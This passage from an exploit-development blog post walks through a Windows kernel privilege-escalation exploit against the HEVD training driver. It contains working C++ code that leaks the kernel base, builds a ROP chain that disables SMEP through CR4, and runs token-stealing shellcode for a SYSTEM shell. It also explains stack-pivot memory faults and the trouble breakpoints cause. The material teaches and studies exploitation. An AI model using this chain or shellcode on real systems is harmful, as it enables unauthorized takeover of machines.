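This is why the fake stack in the code that follows is indexed from 0x48000000 + 0x28: the first ret reads its target from exactly that address.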
Getting back to the code, we implement our attacker-controlled Fake Stack.
<...snip...>
typedef struct _USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
} USER_CONTROLLED_OBJECT;
typedef struct _SMEP {
INT64 STACK_PIVOT;
INT64 POP_RCX;
INT64 MOV_CR4_RCX;
} SMEP;
<...snip...>
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
SMEPBypass.STACK_PIVOT = STACK_PIVOT;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
/*
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
*******************************************************************************
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
*/
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
SMEPBypass.POP_RCX = POP_RCX;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
/*
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
nt!KeClockInterruptNotify+0x2ff5:
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
*/
INT64 MOV_CR4_RCX = NT_BASE_ADDR + 0x003a5fc7;
SMEPBypass.MOV_CR4_RCX = MOV_CR4_RCX;
std::cout << "[+] MOV_CR4_RCX: 0x" << std::hex << MOV_CR4_RCX << std::endl << std::endl;
/*
kd> u nt!KeFlushCurrentTbImmediately+0x17
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
*/
return TRUE;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ (1UL << 20); // CR4 value with bit 20 (SMEP) flipped off
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
int main() {
SMEPBypassInitializer();
exploit();
return 0;
}
After the exploit executes, we get the following WinDBG output:
After the mov esp, 0x48000000 instruction executes, we notice that the system crashes with a bug check named UNEXPECTED_KERNEL_MODE_TRAP (7F). Now let’s look at our stack.
So, what can we do next?
Memory and Components
Now this blogpost can really start. After all the briefing on the techniques, it’s time to explain why the stack is one of the most confusing things in exploit development, and how it can easily turn a simple vulnerability into a brain-melting problem.
Kernel Memory Management
Now we have to go deep into Memory Management in order to understand concepts such as Memory Segments, Virtual Allocation, and Paging.
According to Wikipedia:
The kernel has full access to the system’s memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is virtual addressing, usually achieved by paging and/or segmentation. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtual address.
<…snip…>
In computing, a virtual address space (VAS) or address space is the set of ranges of virtual addresses that an operating system makes available to a process. The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer’s instruction set architecture and supported by the operating system’s pointer size implementation, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate address space.
As we can see, Virtual Addressing refers to the address space assigned to each user application and to kernel functions, reserving memory ranges while the OS is running. When an application starts, the operating system knows it needs to allocate new space in memory, mapping it into a valid range of addresses and thereby avoiding damage to the memory region the kernel is currently using.
That’s what happens when you try to play a game and, for some reason, memory usage grows by several GB before the game even starts: the memory has already been allocated, and most of it starts out zeroed until the game’s file data is loaded into memory.
With malloc() and VirtualAlloc() you can allocate a range of Virtual Memory, and VirtualAlloc() even lets you request a specific base address. That’s why Stack Pivoting is the best way to make this exploit work.
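To make the user-land side of this concrete, here is a minimal sketch that tells which half of the address space a 64-bit virtual address belongs to. It assumes 48-bit virtual addresses (4-level paging). Classify and AddressHalf are hypothetical names used only for illustration, and 0xfffff80000000000 is just an example of an upper-half address, not a value taken from this exploit.

```cpp
#include <cstdint>

enum class AddressHalf { User, Kernel, NonCanonical };

// Assumption: 48-bit virtual addresses, so bits 63..47 must all be equal.
// All zeros -> lower (user) half, all ones -> upper (kernel) half.
constexpr AddressHalf Classify(std::uint64_t va) {
    return (va >> 47) == 0         ? AddressHalf::User
         : (va >> 47) == 0x1FFFF   ? AddressHalf::Kernel
                                   : AddressHalf::NonCanonical;
}

// Addresses requested with VirtualAlloc() in this post.
static_assert(Classify(0x48000000) == AddressHalf::User, "fake stack");
static_assert(Classify(0x80000000) == AddressHalf::User, "shellcode");
// Illustrative upper-half address (an assumption, not from the exploit).
static_assert(Classify(0xfffff80000000000) == AddressHalf::Kernel, "kernel half");
// Bit 47 set without sign extension is not a valid address at all.
static_assert(Classify(0x0000800000000000) == AddressHalf::NonCanonical, "hole");
```

Both 0x48000000 (fake stack) and 0x80000000 (shellcode) land in the lower half, which is what you would expect from anything returned by VirtualAlloc().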
Virtual Memory
As you can see in the image above, Virtual Addresses are what an application/process works with when reading and writing data, so a process can query, allocate, or free memory at any time.
As Wikipedia says:
In computing, virtual memory, or virtual storage, is a memory management technique that provides an “idealized abstraction of the storage resources that are actually available on a given machine” which “creates the illusion to users of a very large (main) memory”.
The computer’s operating system, using a combination of hardware and software, maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory. Address translation hardware in the CPU, often referred to as a Memory Management Unit (MMU), automatically translates virtual addresses to physical addresses. Software within the operating system may extend these capabilities, utilizing, e.g., disk storage, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physically present in the computer.
The primary benefits of virtual memory include freeing applications from having to manage a shared memory space, ability to share memory used by libraries between processes, increased security due to memory isolation, and being able to conceptually use more memory than might be physically available, using the technique of paging or segmentation.
As mentioned before, allocating Virtual Memory ranges (from a user-land perspective) lets us control which addresses our application uses and what data they hold, but there is a catch. When a range of Virtual Memory is allocated, it is not necessarily part of the OS’s physical memory yet, because the allocation is only an abstraction. Going back to our previous example, when a game starts, Virtual Memory is allocated and the Memory Management Unit (MMU) automatically translates between virtual and physical addresses.
From a developer’s perspective, when an application consumes memory it’s important to free()/VirtualFree() unused data, so that it doesn’t crash the whole application once too many addresses are marked as in use by the system. The OS can also deal with processes that consume too much memory by closing them automatically, avoiding critical errors. There are cases where applications exceed the free RAM capacity; in these situations, the allocation can be extended into Disk Storage.
Paged Memory
Physical memory, referred to in this post as Paged Memory, is the memory actually in use by applications and processes. This memory scheme can retrieve data from Virtual Allocations and use that data as part of the current execution.
According to Wikipedia:
Memory Paging
In computer operating systems, memory paging (or swapping on some Unix-like systems) is a memory management scheme by which a computer stores and retrieves data from secondary storage for use in main memory. In this scheme, the operating system retrieves data from secondary storage in same-size blocks called pages. Paging is an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of available physical memory.
Page faults
When a process tries to reference a page not currently mapped to a page frame in RAM, the processor treats this invalid memory reference as a page fault and transfers control from the program to the operating system.
Page Table
A page table is the data structure used by a virtual memory system in a computer operating system to store the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the Random-Access Memory (RAM) subsystem. The page table is a key component of virtual address translation that is necessary to access data in memory.
The kernel can identify whether an address lies in Paged Memory by looking at its Page Table Entry (PTE), which differs for each type of allocation and memory mapping.
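As a rough illustration of the translation, this sketch splits a virtual address into the table indices that the MMU walks on x86-64 with 4-level paging and 4 KB pages (9 bits per level plus a 12-bit page offset). Decompose and PageIndices are hypothetical names, and large pages and 5-level paging are ignored.

```cpp
#include <cstdint>

// Indices used at each level of a 4-level x86-64 page walk (4 KB pages).
struct PageIndices {
    unsigned pml4;    // bits 47..39
    unsigned pdpt;    // bits 38..30
    unsigned pd;      // bits 29..21
    unsigned pt;      // bits 20..12, selects the PTE
    unsigned offset;  // bits 11..0, byte offset inside the page
};

// Hypothetical helper: pure bit slicing, no memory is touched.
constexpr PageIndices Decompose(std::uint64_t va) {
    return PageIndices{
        static_cast<unsigned>((va >> 39) & 0x1FF),
        static_cast<unsigned>((va >> 30) & 0x1FF),
        static_cast<unsigned>((va >> 21) & 0x1FF),
        static_cast<unsigned>((va >> 12) & 0x1FF),
        static_cast<unsigned>(va & 0xFFF)};
}

// The pivot address is the first byte of a page...
static_assert(Decompose(0x48000000).pd == 64, "PD index of the pivot");
static_assert(Decompose(0x48000000).pt == 0, "PT index of the pivot");
static_assert(Decompose(0x48000000).offset == 0, "page aligned");
// ...so the 8 bytes right below it are translated through another PTE.
static_assert(Decompose(0x48000000 - 8).pd == 63, "previous PD entry");
static_assert(Decompose(0x48000000 - 8).pt == 511, "last PTE of that table");
static_assert(Decompose(0x48000000 - 8).offset == 0xFF8, "end of the page");
```

Note how 0x48000000 is the very first byte of a page, so anything pushed below it belongs to a different page (and here even a different page table), which has its own PTE.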
With the Page Table Entry (PTE), the kernel is able to find the correct offset in order to translate between addresses. If the translation hits a memory region that is not validly mapped, a Page Fault is raised, and if the kernel cannot resolve it, the OS crashes. In the case of the Windows kernel, a _KTRAP_FRAME is recorded, and an error like the one below should be expected:
Virtual Allocation issues in Windows System
When developing a binary exploit, memory has to be manipulated in most cases. With Windows API functions called from C/C++, such as VirtualAlloc(), if you allocate memory at address 0x48000000 with size 0x1000, the range from 0x48000000 to 0x48001000 is now recorded in the Page Table as a Virtual Address range, and it will NOT necessarily be treated by the kernel as part of Physical Memory (it may not be resident yet). It’s important to pay attention to this detail, because if you try to use the example above from a Kernel-Land perspective, WinDBG will show a Trap Frame as follows:
To deal with this issue, we can use the VirtualLock() function, since it locks the specified region of the process’s virtual address space into physical memory, thus preventing Page Faults. With that in mind, we can now make sure our Virtual Memory range is backed by Physical memory.
Now it should be possible to achieve code execution, right?
<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
Again, the same error popped up even with the address mapped into Physical Memory.
Pain and Suffering due to DoubleFaults
After a million tests with different memory allocation patterns, I found a possible solution. According to Martin Mielke and kristal-g, some reserved memory should be allocated before the main allocation at address 0x48000000.
When the Trap Frame occurs, we can clearly see that addresses below 0x48000000 are used by the stack, and if these addresses remain unallocated, they can’t be used by the current stack frame.
As you can see, 0x47fffe70 is being used by our stack frame, but since our allocation starts at 0x48000000, that address is not a valid one. To deal with this issue, memory must be reserved before 0x48000000.
<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<...snip...>
Now our allocation actually starts at 0x48000000 - 0x1000, which should finally let us get past the DoubleFault exception.
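The effect of moving the base of the allocation can be checked with plain arithmetic. A small sketch, assuming the 0x47fffe70 stack address reported in this post and the 0x10000 allocation size from the code. Region and Contains are hypothetical helpers, not part of the exploit.

```cpp
#include <cstdint>

// Half-open address range [base, base + size).
struct Region {
    std::uint64_t base;
    std::uint64_t size;
};

// Hypothetical helper: true when addr falls inside the region.
constexpr bool Contains(Region r, std::uint64_t addr) {
    return addr >= r.base && addr - r.base < r.size;
}

constexpr std::uint64_t kPivot = 0x48000000;    // value loaded by the stack pivot
constexpr std::uint64_t kTrapRsp = 0x47fffe70;  // stack address seen in the trap frame

constexpr Region kOriginal{kPivot, 0x10000};              // allocation starting at the pivot
constexpr Region kWithHeadroom{kPivot - 0x1000, 0x10000}; // allocation moved down by one page

static_assert(!Contains(kOriginal, kTrapRsp), "below the first allocation");
static_assert(Contains(kWithHeadroom, kTrapRsp), "covered once the base moves down");
static_assert(kPivot - kTrapRsp == 0x190, "distance below the pivot");
```

The address sits 0x190 bytes below the pivot, so it only falls inside the allocation once the base is moved down.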
Let’s run our exploit again, it should work!
No matter how you try to manage memory, changing addresses or filling up the stack with data and hoping it works, it will always be caught and return an exception, even when your code seems to be correct. It took me around 3 months of rebooting my VM and changing code to understand why it was still happening.
Stack vs DATA
Let’s imagine the stack frame as a big “ball pit” holding a bunch of data: when a new ball is placed in it, all the others change their location. That’s exactly what happens when you try to manipulate memory by switching the current stack to another one, as mov esp, 0x48000000 does. When the current stack frame is modified, it “believes” that the current Physical Memory is mapped to another process, and for some reason you can actually see things like this after the crash.
<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
After polluting the reserved space before the Stack Pivoting offset, we can clearly see that different addresses popped up in our current Stack Frame, but our Trap Frame still remains the same as before: 0x47fffe70. If we fill the whole reserved space with 0x41 bytes, we’ll notice that some bytes show up with different values, as below:
<...snip...>
// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
With these results in mind, we have some alternatives to consider:
- Increase the size of the reserved memory space.
- Try to find a fix for the Stack Frame, in case we really can’t reserve memory before the Stack Pivoting space.
So, let’s first try increasing the size of our reserved memory:
<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
For some reason, after increasing the reserved memory before mov esp, 0x48000000, the whole kernel crashed, and when 0x48000000 is moved into our current RSP register, our stack frame switches to the User Process Context because of the size of the address itself. That’s why I mentioned before that the stack sometimes seems to be a “ball pit”, and after all that, we still get the same Trap Frame exception.
No matter how you try to manipulate memory, it will always be caught and something will crash; after that, WinDBG will handle it as an exception and BSOD your system like a scene from a terrible horror movie.
Breakpoints??…. ooohh!…. Breakpoints!!!!
INT3, a.k.a. 0xCC, or simply a breakpoint, can be defined as a signal for a debugger to catch and stop the execution of an attached process or of code under development. It can be set by clicking a debug option somewhere in an IDE UI, or by inserting the INT3 instruction directly into the target process through the 0xCC opcode. In the WinDBG command line, the bp command is available to set breakpoints on addresses, as follows:
// Common breakpoint: just stop at this address before it runs
bp 0x48000000
// Conditional breakpoint: when hit, check whether r12 is equal to 0x1337
// if not equal, set r12 to 0x1337
// if equal, set r12 to the value of r13
bp 0x48000000 ".if (@r12 != 0x1337) { r r12 = 0x1337 } .else { r r12 = @r13 }"
etc...
It’s also possible to use this mechanism to set a breakpoint in a shellcode and check whether its code runs correctly during exploit development.
BYTE sc[256] = {
0xcc, // <--- Signal the debugger and stop execution
// before the shellcode runs
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff
};
According to Wikipedia:
The INT3 instruction is a one-byte-instruction defined for use by debuggers to temporarily replace an instruction in a running program in order to set a code breakpoint. The more general INT XXh instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long); see SIGTRAP.
The opcode for INT3 is 0xCC, as opposed to the opcode for INT immediate8, which is 0xCD immediate8. Since the dedicated 0xCC opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for an INT3, assemblers do not normally generate the generic 0xCD 0x03 opcode from mnemonics.
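Because INT3 is a single byte, a debugging breakpoint placed at the start of a buffer is easy to detect and skip. A minimal sketch, assuming the breakpoint is always the first byte, as in the sc array above. StartsWithInt3, PayloadOffset and kSample are hypothetical names, and kSample is just a placeholder (int3; nop; nop; ret), not the real shellcode.

```cpp
#include <cstddef>
#include <cstdint>

// One-byte encoding of INT3.
constexpr std::uint8_t kInt3 = 0xCC;

// Hypothetical helper: true when the buffer begins with an INT3 byte.
constexpr bool StartsWithInt3(const std::uint8_t* code, std::size_t size) {
    return size > 0 && code[0] == kInt3;
}

// Hypothetical helper: offset from which the buffer should be copied.
// With keepBreakpoint == false, a leading INT3 is skipped.
constexpr std::size_t PayloadOffset(const std::uint8_t* code, std::size_t size,
                                    bool keepBreakpoint) {
    return (!keepBreakpoint && StartsWithInt3(code, size)) ? 1 : 0;
}

// Placeholder bytes for illustration only: int3; nop; nop; ret.
constexpr std::uint8_t kSample[] = {0xCC, 0x90, 0x90, 0xC3};

static_assert(StartsWithInt3(kSample, sizeof(kSample)), "breakpoint present");
static_assert(PayloadOffset(kSample, sizeof(kSample), true) == 0, "debug run");
static_assert(PayloadOffset(kSample, sizeof(kSample), false) == 1, "normal run");
```

With something like this, the copy into the executable page would start at sc + offset with a length of sizeof(sc) - offset, so the same array can be used with and without the breakpoint.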
After this explanation of breakpoints, it’s important to note that every previous test was run with breakpoints set in order to develop our exploit, but it’s time to forget them and skip all INT3 instructions.
Let’s try re-running our exploit without breakpointing anything.
The kernel doesn’t crash anymore, and system memory stays intact!
Now the shellcode is executed after our SMEP bypass through the ROP chain, and we’re able to spawn an NT AUTHORITY\SYSTEM shell.
BAAAM!! Finally!!!! An NT AUTHORITY\SYSTEM shell after all!
Breakpoints…. HAHA!! BREAKPOINTS!
So, now we can see that breakpoints can also be a dangerous thing in exploit development.
The explanation for this issue seems to be very simple. When the WinDBG debugger catches an exception from the kernel, the Operating System gets a signal that something went wrong, but while Stack Manipulation is going on, everything you do is an exception. The Operating System doesn’t understand that “an attacker is trying to manipulate the Stack”; it just catches the exception and reboots itself because the Stack is different from the current kernel context.
This headache is similar to what happens with Structured Exception Handling (SEH) vulnerabilities, where setting breakpoints, or even just attaching a debugger to a process, can crash it or make it unusable.
In my case, the way to get past the exception was to ignore all breakpoints and not let the kernel reboot on a Non-Critical exception.
Final Considerations
With this blogpost, I’ve learned a lot that I didn’t know before I started writing. It was a fun and extremely technical experience (especially for me). It took me 2 days to write about a thing which cost me 3 months! You probably had a 10-minute read, which is awesome and makes me happy too!
It’s important to note that most of this blogpost is a deep explanation of memory itself, and an attempt to show how, as attackers, we can improve the way we deal with trouble by looking around for every possibility that can help us achieve our goal, in this case an NT AUTHORITY\SYSTEM shell.
Beware of the Stack and of Breakpoints: these things can be a headache sometimes, and you will NEVER know until you think about changing your attack methodology.
Thanks to the people who helped me along the way:
